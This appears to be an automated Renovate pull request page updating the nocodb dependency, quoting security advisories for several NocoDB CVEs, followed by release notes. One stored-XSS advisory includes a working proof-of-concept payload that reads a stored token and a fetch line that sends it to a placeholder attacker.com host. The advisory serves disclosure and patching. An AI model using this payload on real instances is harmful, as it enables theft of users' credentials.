Update dependency nocodb to ^0.202.0 [SECURITY]#145
Open
renovate[bot] wants to merge 1 commit intodevelopfrom
Open
Update dependency nocodb to ^0.202.0 [SECURITY]#145renovate[bot] wants to merge 1 commit intodevelopfrom
renovate[bot] wants to merge 1 commit intodevelopfrom
Conversation
65fc1bd to
5137d3c
Compare
5137d3c to
bd68263
Compare
bd68263 to
6258c9a
Compare
6258c9a to
33d898b
Compare
33d898b to
8d94b38
Compare
24e0aca to
7f0ef8f
Compare
7f0ef8f to
7f67c27
Compare
7f67c27 to
bd39e39
Compare
bd39e39 to
a719f6f
Compare
a719f6f to
1c9c6ab
Compare
1c9c6ab to
6cce464
Compare
6cce464 to
fc27c83
Compare
fc27c83 to
2e0bbb8
Compare
2e0bbb8 to
9a4ad8b
Compare
9a4ad8b to
9ef03c0
Compare
9ef03c0 to
d64dfd5
Compare
d64dfd5 to
90c0257
Compare
90c0257 to
716ddcf
Compare
efa8655 to
702990d
Compare
702990d to
ec7f8f9
Compare
ec7f8f9 to
0dfbfa6
Compare
0c148ae to
c7531fc
Compare
c7531fc to
13f118d
Compare
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
This PR contains the following updates:
^0.83.0→^0.202.0Cross-site Scripting in NocoDB
CVE-2022-2079 / GHSA-hv6q-5g4f-8897
More information
Details
Cross-site Scripting (XSS) - Stored in GitHub repository nocodb/nocodb prior to 0.91.9.
Severity
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:NReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
Improper Privilege Management in NocoDB
CVE-2022-2063 / GHSA-fq4h-m3c8-8m2v
More information
Details
Improper Privilege Management in GitHub repository nocodb/nocodb prior to 0.91.8.
Severity
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:HReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
Insufficient Session Expiration in NocoDB
CVE-2022-2064 / GHSA-6293-2vg2-pmp5
More information
Details
Insufficient Session Expiration in GitHub repository nocodb/nocodb prior to 0.91.9.
Severity
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:HReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
NocoDB vulnerable to Denial of Service
CVE-2022-3423 / GHSA-grv6-m753-3w2g
More information
Details
NocoDB prior to 0.92.0 allows actors to insert large characters into the input field
New Projecton the create field, which can cause a Denial of Service (DoS) via a crafted HTTP request. Version 0.92.0 fixes this issue.Severity
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:HReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
NocoDB information disclosure vulnerability
CVE-2022-2062 / GHSA-mx8q-jqwm-85mv
More information
Details
In NocoDB prior to 0.91.7, the SMTP plugin doesn't have verification or validation. This allows attackers to make requests to internal servers and read the contents.
Severity
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:NReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
Improper Input Validation in nocodb
CVE-2023-5104 / GHSA-xrpm-hccg-28x7
More information
Details
Improper Input Validation in GitHub repository nocodb/nocodb prior to 0.96.0.
Severity
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:HReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
nocodb SQL Injection vulnerability
CVE-2023-43794 / GHSA-3m5q-q39v-xf8f
More information
Details
Summary
Nocodb contains SQL injection vulnerability, that allows an authenticated attacker with creator access to query the underlying database.
Product
nocodb/nocodb
Tested Version
0.109.2
Details
SQL injection in
SqliteClient.ts(GHSL-2023-141)By supplying a specially crafted payload to the given below parameter and endpoint, an attacker can inject arbitrary SQL queries to be executed. Since this is a blind SQL injections, an attacker may need to use time-based payloads which would include a function to delay execution for a given number of seconds. The response time indicates, whether the result of the query execution was true or false. Depending on the result, the HTTP response will be returned after a given number of seconds, indicating TRUE, or immediately, indicating FALSE. In that way, an attacker can reveal the data present in the database.
The
triggerListmethod creates a SQL query using the user-controlledtable_nameparameter value from thetableCreateendpoint.Impact
This issue may lead to
Information Disclosure.Credit
This issue was discovered and reported by GHSL team member @sylwia-budzynska (Sylwia Budzynska).
Disclosure Policy
This report is subject to our coordinated disclosure policy.
Severity
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:NReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
NocoDB SQL Injection vulnerability
CVE-2023-50718 / GHSA-8fxg-mr34-jqr8
More information
Details
Summary
An authenticated attacker with create access could conduct a SQL Injection attack on MySQL DB using unescaped table_name.
Details
SQL Injection vulnerability occurs in VitessClient.ts.
The variable ${args.tn} refers to the table name entered by the user.
A malicious attacker can escape the existing query by including a special character (') in the table name and insert and execute a new arbitrary SQL query.
Impact
This vulnerability may result in leakage of sensitive data in the database.
Severity
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:NReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
NocoDB Vulnerable to Stored Cross-Site Scripting in Formula.vue
CVE-2023-49781 / GHSA-h6r4-xvw6-jc5h
More information
Details
Summary
A stored cross-site scripting vulnerability exists within the Formula virtual cell comments functionality.
Details
The nc-gui/components/virtual-cell/Formula.vue displays a v-html tag with the value of "urls" whose contents are processed by the function replaceUrlsWithLink(). This function recognizes the pattern URI::(XXX) and creates a hyperlink tag with href=XXX. However, it leaves all the other contents outside of the pattern URI::(XXX) unchanged, which makes the evil users can create a malicious table with a formula field whose payload is <img src=1 onerror="malicious javascripts"URI::(XXX). The evil users then can share this table with others by enabling public viewing and the victims who open the shared link can be attacked.
PoC
Step 1: Attacker login the nocodb and creates a table with two fields, "T" and "F". The type of field "T" is "SingleLineText", and the type of the "F" is "Fomula" with the formula content {T}
Step 2: The attacker sets the contents of T using <img src=1 onerror=alert(localStorage.getItem('nocodb-gui-v2'))URI::(XXX)
Step 3: The attacker clicks the "Share" button and enables public viewing, then copies the shared link and sends it to the victims
Step 4: Any victims who open the shared link in their browsers will see the alert with their confidential tokens stored in localStorage
The attackers can use the fetch(http://attacker.com/?localStorage.getItem('nocodb-gui-v2')) to replace the alert and then steal the victims' credentials in their attacker.com website.
Impact
Stealing the credentials of NocoDB user that clicks the malicious link.
Severity
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:NReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
Release Notes
nocodb/nocodb (nocodb)
v0.202.10: : Bug Fix ReleaseCompare Source
🚀 NocoDB : Bug Fix Release
What's Changed
🐛 Closed Issues
NocoDB Cloud Available#69700108002to0111002failed", Relation aready exists #6826Rollupsumfordurationfield,the data display should also beduration, but it shows the number of seconds. #6778New Contributors
Full Changelog: nocodb/nocodb@0.202.9...0.202.10
v0.202.9: : Bug Fix ReleaseCompare Source
🚀 NocoDB : Bug Fix Release
🐛 Closed Issues
save changeson closing expanded record #7066Lookup > Child fieldneeds fix #6989IDnot ignored if sent in API payload #5871What's Changed
New Contributors
Full Changelog: nocodb/nocodb@0.202.8...0.202.9
v0.202.8: : Bug Fix ReleaseCompare Source
🚀 NocoDB : Bug Fix Release
🐛 Closed Issues
What's Changed
New Contributors
Full Changelog: nocodb/nocodb@0.202.7...0.202.8
v0.202.7: : Hotfix ReleaseCompare Source
🚀 NocoDB : Hotfix Release
What's Changed
Full Changelog: nocodb/nocodb@0.202.6...0.202.7
v0.202.6: : Bug Fix ReleaseCompare Source
🚀 NocoDB : Bug Fix Release
🐛 Closed Issues
Linked recordsmodal from form view is stuck with skeleton loader #6844Team & Settingsnot accessible for Org Creator #6784Configuration
📅 Schedule: (UTC)
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.